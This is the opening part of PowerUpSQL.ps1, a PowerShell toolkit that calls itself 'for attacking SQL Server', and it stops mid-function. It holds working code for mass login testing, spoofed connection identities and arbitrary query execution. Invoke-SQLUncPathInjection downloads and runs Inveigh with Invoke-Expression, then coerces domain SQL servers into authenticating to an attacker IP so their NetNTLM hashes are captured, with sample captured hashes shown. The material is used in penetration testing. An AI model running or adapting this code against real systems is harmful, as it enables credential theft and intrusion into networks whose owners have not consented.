#requires -version 2 <# File: PowerUpSQL.ps1 Author: Scott Sutherland (@_nullbind), NetSPI - 2019 Major Contributors: Antti Rantasaari and Eric Gruber Version: 1.104.13 Description: PowerUpSQL is a PowerShell toolkit for attacking SQL Server. License: BSD 3-Clause Required Dependencies: PowerShell v.2 Optional Dependencies: None #> ######################################################################### # #region CORE FUNCTIONS # ######################################################################### # ---------------------------------- # Get-SQLConnectionObject # ---------------------------------- # Author: Scott Sutherland # Reference: https://msdn.microsoft.com/en-us/library/ms188247.aspx # Reference: https://raw.githubusercontent.com/sqlcollaborative/dbatools/master/functions/SharedFunctions.ps1 # Reference: https://blogs.msdn.microsoft.com/spike/2008/11/14/connectionstrings-mixing-usernames-and-windows-authentication-who-goes-first/ Function Get-SQLConnectionObject { <# .SYNOPSIS Creates a object for connecting to SQL Server. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Database Default database to connect to. .PARAMETER AppName Spoof the name of the application you are connecting to SQL Server with. .PARAMETER WorkstationId Spoof the name of the workstation/hostname you are connecting to SQL Server with. .PARAMETER Encrypt Use an encrypted connection. .PARAMETER TrustServerCert Trust the certificate of the remote server. .EXAMPLE PS C:\> Get-SQLConnectionObject -Username myuser -Password mypass -Instance server1 -Encrypt Yes -TrustServerCert Yes -AppName "myapp" StatisticsEnabled : False AccessToken : ConnectionString : Server=server1;Database=Master;User ID=myuser;Password=mypass;Connection Timeout=1 ;Application Name="myapp";Encrypt=Yes;TrustServerCertificate=Yes ConnectionTimeout : 1 Database : Master DataSource : server1 PacketSize : 8000 ClientConnectionId : 00000000-0000-0000-0000-000000000000 ServerVersion : State : Closed WorkstationId : Workstation1 Credential : FireInfoMessageEventOnUserErrors : False Site : Container : #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Dedicated Administrator Connection (DAC).')] [Switch]$DAC, [Parameter(Mandatory = $false, HelpMessage = 'Default database to connect to.')] [String]$Database, [Parameter(Mandatory = $false, HelpMessage = 'Spoof the name of the application your connecting to the server with.')] [string]$AppName = "", [Parameter(Mandatory = $false, HelpMessage = 'Spoof the name of the workstation/hostname your connecting to the server with.')] [string]$WorkstationId = "", [Parameter(Mandatory = $false, HelpMessage = 'Use an encrypted connection.')] [ValidateSet("Yes","No","")] [string]$Encrypt = "", [Parameter(Mandatory = $false, HelpMessage = 'Trust the certificate of the remote server.')] [ValidateSet("Yes","No","")] [string]$TrustServerCert = "", [Parameter(Mandatory = $false, HelpMessage = 'Connection timeout.')] [string]$TimeOut = 1 ) Begin { # Setup DAC string if($DAC) { $DacConn = 'ADMIN:' } else { $DacConn = '' } # Set database filter if(-not $Database) { $Database = 'Master' } # Check if appname was provided if($AppName){ $AppNameString = ";Application Name=`"$AppName`"" }else{ $AppNameString = "" } # Check if workstationid was provided if($WorkstationId){ $WorkstationString = ";Workstation Id=`"$WorkstationId`"" }else{ $WorkstationString = "" } # Check if encrypt was provided if($Encrypt){ $EncryptString = ";Encrypt=Yes" }else{ $EncryptString = "" } # Check TrustServerCert was provided if($TrustServerCert){ $TrustCertString = ";TrustServerCertificate=Yes" }else{ $TrustCertString = "" } } Process { # Check for instance if ( -not $Instance) { $Instance = $env:COMPUTERNAME } # Create connection object $Connection = New-Object -TypeName System.Data.SqlClient.SqlConnection # Set authentcation type - current windows user if(-not $Username){ # Set authentication type $AuthenticationType = "Current Windows Credentials" # Set connection string $Connection.ConnectionString = "Server=$DacConn$Instance;Database=$Database;Integrated Security=SSPI;Connection Timeout=1$AppNameString$EncryptString$TrustCertString$WorkstationString" } # Set authentcation type - provided windows user if ($username -like "*\*"){ $AuthenticationType = "Provided Windows Credentials" # Setup connection string $Connection.ConnectionString = "Server=$DacConn$Instance;Database=$Database;Integrated Security=SSPI;uid=$Username;pwd=$Password;Connection Timeout=$TimeOut$AppNameString$EncryptString$TrustCertString$WorkstationString" } # Set authentcation type - provided sql login if (($username) -and ($username -notlike "*\*")){ # Set authentication type $AuthenticationType = "Provided SQL Login" # Setup connection string $Connection.ConnectionString = "Server=$DacConn$Instance;Database=$Database;User ID=$Username;Password=$Password;Connection Timeout=$TimeOut$AppNameString$EncryptString$TrustCertString$WorkstationString" } # Return the connection object return $Connection } End { } } # ---------------------------------- # Get-SQLConnectionTest # ---------------------------------- # Author: Scott Sutherland Function Get-SQLConnectionTest { <# .SYNOPSIS Tests if the current Windows account or provided SQL Server login can log into an SQL Server. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER Database Default database to connect to. .PARAMETER TimeOut Connection time out. .PARAMETER SuppressVerbose Suppress verbose errors. Used when function is wrapped. .EXAMPLE PS C:\> Get-SQLConnectionTest -Verbose -Instance "SQLSERVER1.domain.com\SQLExpress" .EXAMPLE PS C:\> Get-SQLConnectionTest -Verbose -Instance "SQLSERVER1.domain.com,1433" .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLConnectionTest -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'IP Address of SQL Server.')] [string]$IPAddress, [Parameter(Mandatory = $false, HelpMessage = 'IP Address Range In CIDR Format to Audit.')] [string]$IPRange, [Parameter(Mandatory = $false, HelpMessage = 'Connect using Dedicated Admin Connection.')] [Switch]$DAC, [Parameter(Mandatory = $false, HelpMessage = 'Default database to connect to.')] [String]$Database, [Parameter(Mandatory = $false, HelpMessage = 'Connection timeout.')] [string]$TimeOut, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Setup data table for output $TblResults = New-Object -TypeName System.Data.DataTable $null = $TblResults.Columns.Add('ComputerName') $null = $TblResults.Columns.Add('Instance') $null = $TblResults.Columns.Add('Status') } Process { # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Split Demarkation Start ^ # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance if($IPRange -and $IPAddress) { if ($IPAddress.Contains(",")) { $ContainsValid = $false foreach ($IP in $IPAddress.Split(",")) { if($(Test-Subnet -cidr $IPRange -ip $IP)) { $ContainsValid = $true } } if (-not $ContainsValid) { Write-Warning "Skipping $ComputerName ($IPAddress)" $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Out of Scope') return } } if(-not $(Test-Subnet -cidr $IPRange -ip $IPAddress)) { Write-Warning "Skipping $ComputerName ($IPAddress)" $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Out of Scope') return } Write-Verbose "$ComputerName ($IPAddress)" } # Setup DAC string if($DAC) { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut -Database $Database } else { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -Database $Database } # Attempt connection try { # Open connection $Connection.Open() if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Accessible') # Close connection $Connection.Close() # Dispose connection $Connection.Dispose() } catch { # Connection failed if(-not $SuppressVerbose) { $ErrorMessage = $_.Exception.Message Write-Verbose -Message "$Instance : Connection Failed." Write-Verbose -Message " Error: $ErrorMessage" } # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible') } } End { # Return Results $TblResults } } # ---------------------------------- # Get-SQLConnectionTestThreaded # ---------------------------------- # Author: Scott Sutherland Function Get-SQLConnectionTestThreaded { <# .SYNOPSIS Tests if the current Windows account or provided SQL Server login can log into an SQL Server. This version support threading using runspaces. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER Database Default database to connect to. .PARAMETER TimeOut Connection time out. .PARAMETER SuppressVerbose Suppress verbose errors. Used when function is wrapped. .PARAMETER Threads Number of concurrent threads. .EXAMPLE PS C:\> Get-SQLConnectionTestThreaded -Verbose -Instance "SQLSERVER1.domain.com\SQLExpress" -Threads 15 .EXAMPLE PS C:\> Get-SQLConnectionTestThreaded -Verbose -Instance "SQLSERVER1.domain.com,1433" -Threads 15 .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose -Threads 15 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'IP Address of SQL Server.')] [string]$IPAddress, [Parameter(Mandatory = $false, HelpMessage = 'IP Address Range In CIDR Format to Audit.')] [string]$IPRange, [Parameter(Mandatory = $false, HelpMessage = 'Connect using Dedicated Admin Connection.')] [Switch]$DAC, [Parameter(Mandatory = $false, HelpMessage = 'Default database to connect to.')] [String]$Database, [Parameter(Mandatory = $false, HelpMessage = 'Connection timeout.')] [string]$TimeOut, [Parameter(Mandatory = $false, HelpMessage = 'Number of threads.')] [int]$Threads = 5, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Setup data table for output $TblResults = New-Object -TypeName System.Data.DataTable $null = $TblResults.Columns.Add('ComputerName') $null = $TblResults.Columns.Add('Instance') $null = $TblResults.Columns.Add('Status') # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Ensure provided instance is processed if($Instance) { $ProvideInstance = New-Object -TypeName PSObject -Property @{ Instance = $Instance; } } if($Instance -and $IPAddress) { $ProvideInstance | Add-Member -Name "IPAddress" -Value $IPAddress } # Add instance to instance list $PipelineItems = $PipelineItems + $ProvideInstance } Process { # Create list of pipeline items $PipelineItems = $PipelineItems + $_ } End { # Define code to be multi-threaded $MyScriptBlock = { # Setup instance $Instance = $_.Instance $IPAddress = $_.IPAddress # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance if($IPRange -and $IPAddress) { if ($IPAddress.Contains(",")) { $ContainsValid = $false foreach ($IP in $IPAddress.Split(",")) { if($(Test-Subnet -cidr $IPRange -ip $IP)) { $ContainsValid = $true } } if (-not $ContainsValid) { Write-Warning "Skipping $ComputerName ($IPAddress)" $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Out of Scope') return } } if(-not $(Test-Subnet -cidr $IPRange -ip $IPAddress)) { Write-Warning "Skipping $ComputerName ($IPAddress)" $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Out of Scope') return } Write-Verbose "$ComputerName ($IPAddress)" } # Setup DAC string if($DAC) { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut -Database $Database } else { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -Database $Database } # Attempt connection try { # Open connection $Connection.Open() if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Accessible') # Close connection $Connection.Close() # Dispose connection $Connection.Dispose() } catch { # Connection failed if(-not $SuppressVerbose) { $ErrorMessage = $_.Exception.Message Write-Verbose -Message "$Instance : Connection Failed." #Write-Verbose " Error: $ErrorMessage" } # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible') } } # Run scriptblock using multi-threading $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue return $TblResults } } # ---------------------------------- # Get-SQLQuery # ---------------------------------- # Author: Scott Sutherland Function Get-SQLQuery { <# .SYNOPSIS Executes a query on target SQL servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER Database Default database to connect to. .PARAMETER TimeOut Connection time out. .PARAMETER SuppressVerbose Suppress verbose errors. Used when function is wrapped. .PARAMETER Threads Number of concurrent threads. .PARAMETER Query Query to be executed on the SQL Server. .PARAMETER AppName Spoof the name of the application you are connecting to SQL Server with. .PARAMETER WorkstationId Spoof the name of the workstation/hostname you are connecting to SQL Server with. .PARAMETER Encrypt Use an encrypted connection. .PARAMETER TrustServerCert Trust the certificate of the remote server. .EXAMPLE PS C:\> Get-SQLQuery -Verbose -Instance "SQLSERVER1.domain.com\SQLExpress" -Query "Select @@version" -Threads 15 .EXAMPLE PS C:\> Get-SQLQuery -Verbose -Instance "SQLSERVER1.domain.com,1433" -Query "Select @@version" -Threads 15 .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLQuery -Verbose -Query "Select @@version" -Threads 15 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server query.')] [string]$Query, [Parameter(Mandatory = $false, HelpMessage = 'Connect using Dedicated Admin Connection.')] [Switch]$DAC, [Parameter(Mandatory = $false, HelpMessage = 'Default database to connect to.')] [String]$Database, [Parameter(Mandatory = $false, HelpMessage = 'Connection timeout.')] [int]$TimeOut, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose, [Parameter(Mandatory = $false, HelpMessage = 'Spoof the name of the application your connecting to the server with.')] [string]$AppName = "", [Parameter(Mandatory = $false, HelpMessage = 'Spoof the name of the workstation/hostname your connecting to the server with.')] [string]$WorkstationId = "", [Parameter(Mandatory = $false, HelpMessage = 'Use an encrypted connection.')] [ValidateSet("Yes","No","")] [string]$Encrypt = "", [Parameter(Mandatory = $false, HelpMessage = 'Trust the certificate of the remote server.')] [ValidateSet("Yes","No","")] [string]$TrustServerCert = "", [Parameter(Mandatory = $false, HelpMessage = 'Return error message if exists.')] [switch]$ReturnError ) Begin { # Setup up data tables for output $TblQueryResults = New-Object -TypeName System.Data.DataTable } Process { # Setup DAC string if($DAC) { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -DAC -Database $Database -AppName $AppName -WorkstationId $WorkstationId -Encrypt $Encrypt -TrustServerCert $TrustServerCert } else { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -Database $Database -AppName $AppName -WorkstationId $WorkstationId -Encrypt $Encrypt -TrustServerCert $TrustServerCert } # Parse SQL Server instance name $ConnectionString = $Connection.Connectionstring $Instance = $ConnectionString.split(';')[0].split('=')[1] # Check for query if($Query) { # Attempt connection try { # Open connection $Connection.Open() if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } # Setup SQL query $Command = New-Object -TypeName System.Data.SqlClient.SqlCommand -ArgumentList ($Query, $Connection) # Grab results $Results = $Command.ExecuteReader() # Load results into data table $TblQueryResults.Load($Results) # Close connection $Connection.Close() # Dispose connection $Connection.Dispose() } catch { # Connection failed - for detail error use Get-SQLConnectionTest if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } if($ReturnError) { $ErrorMessage = $_.Exception.Message #Write-Verbose " Error: $ErrorMessage" } } } else { Write-Output -InputObject 'No query provided to Get-SQLQuery function.' Break } } End { # Return Results if($ReturnError) { $ErrorMessage } else { $TblQueryResults } } } # ---------------------------------- # Get-SQLQueryThreaded # ---------------------------------- # Author: Scott Sutherland Function Get-SQLQueryThreaded { <# .SYNOPSIS Executes a query on target SQL servers.This version support threading using runspaces. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER Database Default database to connect to. .PARAMETER TimeOut Connection time out. .PARAMETER SuppressVerbose Suppress verbose errors. Used when function is wrapped. .PARAMETER Threads Number of concurrent host threads. .PARAMETER Query Query to be executed on the SQL Server. .EXAMPLE PS C:\> Get-SQLQueryThreaded -Verbose -Instance "SQLSERVER1.domain.com\SQLExpress" -Query "Select @@version" -Threads 15 .EXAMPLE PS C:\> Get-SQLQueryThreaded -Verbose -Instance "SQLSERVER1.domain.com,1433" -Query "Select @@version" -Threads 15 .EXAMPLE PS C:\> Get-SQLInstanceDomain | Get-SQLQueryThreaded -Verbose -Query "Select @@version" -Threads 15 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Connect using Dedicated Admin Connection.')] [Switch]$DAC, [Parameter(Mandatory = $false, HelpMessage = 'Default database to connect to.')] [String]$Database, [Parameter(Mandatory = $true, HelpMessage = 'Query to be executed.')] [String]$Query, [Parameter(Mandatory = $false, HelpMessage = 'Connection timeout.')] [string]$TimeOut, [Parameter(Mandatory = $false, HelpMessage = 'Number of threads.')] [int]$Threads = 5, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Setup data table for output $TblResults = New-Object -TypeName System.Data.DataTable # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Ensure provided instance is processed if($Instance) { $ProvideInstance = New-Object -TypeName PSObject -Property @{ Instance = $Instance } } # Add instance to instance list $PipelineItems = $PipelineItems + $ProvideInstance } Process { # Create list of pipeline items $PipelineItems = $PipelineItems + $_ } End { # Define code to be multi-threaded $MyScriptBlock = { $Instance = $_.Instance # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Setup DAC string if($DAC) { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut -Database $Database } else { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut -Database $Database } # Attempt connection try { # Open connection $Connection.Open() if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } # Setup SQL query $Command = New-Object -TypeName System.Data.SqlClient.SqlCommand -ArgumentList ($Query, $Connection) # Grab results $Results = $Command.ExecuteReader() # Load results into data table $TblResults.Load($Results) # Close connection $Connection.Close() # Dispose connection $Connection.Dispose() } catch { # Connection failed if(-not $SuppressVerbose) { $ErrorMessage = $_.Exception.Message Write-Verbose -Message "$Instance : Connection Failed." #Write-Verbose " Error: $ErrorMessage" } # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible') } } # Run scriptblock using multi-threading $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue return $TblResults } } #endregion ######################################################################### # #region COMMON FUNCTIONS # ######################################################################### # ---------------------------------- # Invoke-SQLUncPathInjection # ---------------------------------- # Author: Scott Sutherland (@_nullbind) # Updates: Thomas Elling Function Invoke-SQLUncPathInjection { <# .SYNOPSIS Locates domain sql servers, loads inveigh, attempts login, and unc path injects to capture password hash of associated service account. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER CaptureIp IP address for listening and packet sniffing. .EXAMPLE PS C:\> Invoke-SQLUncPathInjection -Verbose -CaptureIp VERBOSE: Inveigh loaded VERBOSE: You have Administrator rights. VERBOSE: Grabbing SPNs from the domain for SQL Servers (MSSQL*)... VERBOSE: Parsing SQL Server instances from SPNs... VERBOSE: 36 instances were found. VERBOSE: Attempting to log into each instance... ... Cleartext NetNTLMv1 --------- --------- Server1$::demo.local:A0F2FF845622186D00000000000000000000000000000000:091B709EFB488SDFSDF525D526BB5DCAAFE352C88A818A... Server1$::demo.local:FFAF3DA18451B1CA00000000000000000000000000000000:7C3296SDF07E0230B4EF7D892789EB5F0D3ED251C4186... Workstation$::demo.local:3284525F0D2A495B00000000000000000000000000000000:EF6CAD0F2738000490FSDFE5628CC82DAE67BE92A77690CB... NASServer1$::demo.local:432194457F8D1D6FA00000000000000000000000000000000:63EE53E0D93448BC003BB560F80ASDF72881B676B529174F... SvcUser::demo.local:DC334ECBFDD018B700000000000000000000000000000000:98A367A3E26A6E0F99E9F3DBE427FA07B231A9F6DCD51A8F... DBA::demo.local:875A296AAFEDA8BE00000000000000000000000000000000:DDA8D84AA3F79807DSDF7ECD648264187FBD7EB849128... .NOTES alt domain user: runas /noprofile /netonly /user:domain\users powershell.exe #> [CmdletBinding()] Param( [Parameter(Mandatory=$false)] [string]$Username, [Parameter(Mandatory=$false)] [string]$Password, [Parameter(Mandatory=$false)] [string]$DomainController, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory=$true)] [string]$CaptureIp, [Parameter(Mandatory=$false)] [int]$TimeOut = 5, [Parameter(Mandatory=$false)] [int]$Threads = 10 ) Begin { # Attempt to load Inveigh via reflection - naturally this bombs if there is no outbound internet. Exits if not loaded. try { Invoke-Expression -Command (New-Object -TypeName system.net.webclient).downloadstring('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1') -ErrorAction Stop Write-Verbose "Inveigh loaded" } catch { $ErrorMessage = $_.Exception.Message Write-Verbose "$ErrorMessage" # Check if Inveigh is loaded in memory $Loaded = Test-Path -Path Function:\Invoke-Inveigh if($Loaded -eq 'True') { Write-Verbose "Inveigh loaded." }else{ Write-Verbose "Inveigh NOT loaded. Ensure Inveigh is loaded." break } } # Create table $TblInveigh = New-Object -TypeName System.Data.DataTable $null = $TblInveigh.Columns.Add('Cleartext') $null = $TblInveigh.Columns.Add('NetNTLMv1') $null = $TblInveigh.Columns.Add('NetNTLMv2') } Process { # Check if the current process has elevated privs # https://msdn.microsoft.com/en-us/library/system.security.principal.windowsprincipal(v=vs.110).aspx $CurrentIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent() $prp = New-Object -TypeName System.Security.Principal.WindowsPrincipal -ArgumentList ($CurrentIdentity) $adm = [System.Security.Principal.WindowsBuiltInRole]::Administrator $IsAdmin = $prp.IsInRole($adm) if (-not $IsAdmin) { Write-Verbose -Message "You do not have Administrator rights. Run this function in a privileged process for best results." } else { Write-Verbose -Message "You have Administrator rights." } # If SQL instances are not provided, autopug if(-not $Instance) { # Discover SQL Servers on the Domain via LDAP queries for SPN records $SQLServerInstances = Get-SQLInstanceDomain -verbose -DomainController $DomainController -Username $Username -Password $Password } else { # Test instances from pipeline and check connectivity $SQLServerInstances = $Instance } # Get list of SQL Servers that the provided account can log into Write-Verbose -Message "Attempting to log into each instance..." $AccessibleSQLServers = $SQLServerInstances | Get-SQLConnectionTestThreaded -Verbose -Threads $Threads | ? {$_.status -eq "Accessible"} $AccessibleSQLServersCount = $AccessibleSQLServers.count # Status user Write-Verbose -Message "$AccessibleSQLServersCount SQL Server instances can be logged into" Write-Verbose -Message "Starting UNC path injections against $AccessibleSQLServersCount instances..." # Start sniffing Write-Verbose -Message "Starting Invoke-Inveigh..." Invoke-Inveigh -NBNS Y -MachineAccounts Y -IP $CaptureIp | Out-Null # Perform unc path injection on each one $AccessibleSQLServers | ForEach-Object{ # Get current instance $CurrentInstance = $_.Instance # Randomized 5 character file name $UncFileName = (-join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_})) # Start unc path injection for each interface Write-Verbose -Message "$CurrentInstance - Injecting UNC path to \\$CaptureIp\$UncFileName" # Functions executable by the Public role that accept UNC paths - SQL Server 2000 to 2008 # https://support.microsoft.com/en-us/help/321185/how-to-determine-the-version--edition-and-update-level-of-sql-server-a # Check version $SQLVersionFull = Get-SQLServerInfo -Instance $CurrentInstance -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber if($SQLVersionFull) { $SQLVersionShort = $SQLVersionFull.Split('.')[0] } # Run the BACKUP commands for older version only (MS16-136) if([int]$SQLVersionShort -le 11) { Get-SQLQuery -Instance $CurrentInstance -Username $Username -Password $Password -Query "BACKUP LOG [TESTING] TO DISK = '\\$CaptureIp\$UncFileName'" -SuppressVerbose | out-null Get-SQLQuery -Instance $CurrentInstance -Username $Username -Password $Password -Query "BACKUP DATABASE [TESTING] TO DISK = '\\$CaptureIp\$UncFileName'" -SuppressVerbose | out-null } # Functions executable by the Public role that accept UNC paths Get-SQLQuery -Instance $CurrentInstance -Username $Username -Password $Password -Query "xp_dirtree '\\$CaptureIp\$UncFileName'" -SuppressVerbose | out-null Get-SQLQuery -Instance $CurrentInstance -Username $Username -Password $Password -Query "xp_fileexist '\\$CaptureIp\$UncFileName'" -SuppressVerbose | out-null # Sleep to give the SQL Server time to send us hashes :) sleep $TimeOut # Display stuff Get-Inveigh -Cleartext | Sort-Object | ForEach-Object { Write-Verbose -Message " - Cleartext: $_" } Get-Inveigh -NTLMv1 | Sort-Object | ForEach-Object { Write-Verbose -Message " - NetNTLMv1: $_" } Get-Inveigh -NTLMv2 | Sort-Object | ForEach-Object { Write-Verbose -Message " - NetNTLMv2: $_" } } } End { # Get cleartext returned Get-Inveigh -Cleartext | Sort-Object | ForEach-Object { # Add records [string]$NTLMv1 = "" [string]$NTLMv2 = "" [string]$Cleartext = $_ $null = $TblInveigh.Rows.Add([string]$Cleartext, [string]$NTLMv1, [string]$NTLMv2) } # Get NetNTLMv1 returned Get-Inveigh -NTLMv1 | Sort-Object | ForEach-Object { # Add records [string]$NTLMv1 = $_ [string]$NTLMv2 = "" [string]$Cleartext = "" $null = $TblInveigh.Rows.Add([string]$Cleartext, [string]$NTLMv1, [string]$NTLMv2) } # Get NetNTLMv2 returned Get-Inveigh -NTLMv2 | Sort-Object | ForEach-Object { # Add records [string]$NTLMv1 = "" [string]$NTLMv2 = $_ [string]$Cleartext = "" $null = $TblInveigh.Rows.Add([string]$Cleartext, [string]$NTLMv1, [string]$NTLMv2) } # Clear pw hash cache Clear-Inveigh | Out-Null # Stop pw hash capture Stop-Inveigh | Out-Null # Return results $TblInveigh } } # ---------------------------------- # Invoke-SQLOSCmd # ---------------------------------- # Author: Scott Sutherland Function Invoke-SQLOSCmd { <# .SYNOPSIS Execute command on the operating system as the SQL Server service account using xp_cmdshell. Supports threading, raw output, and table output. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential 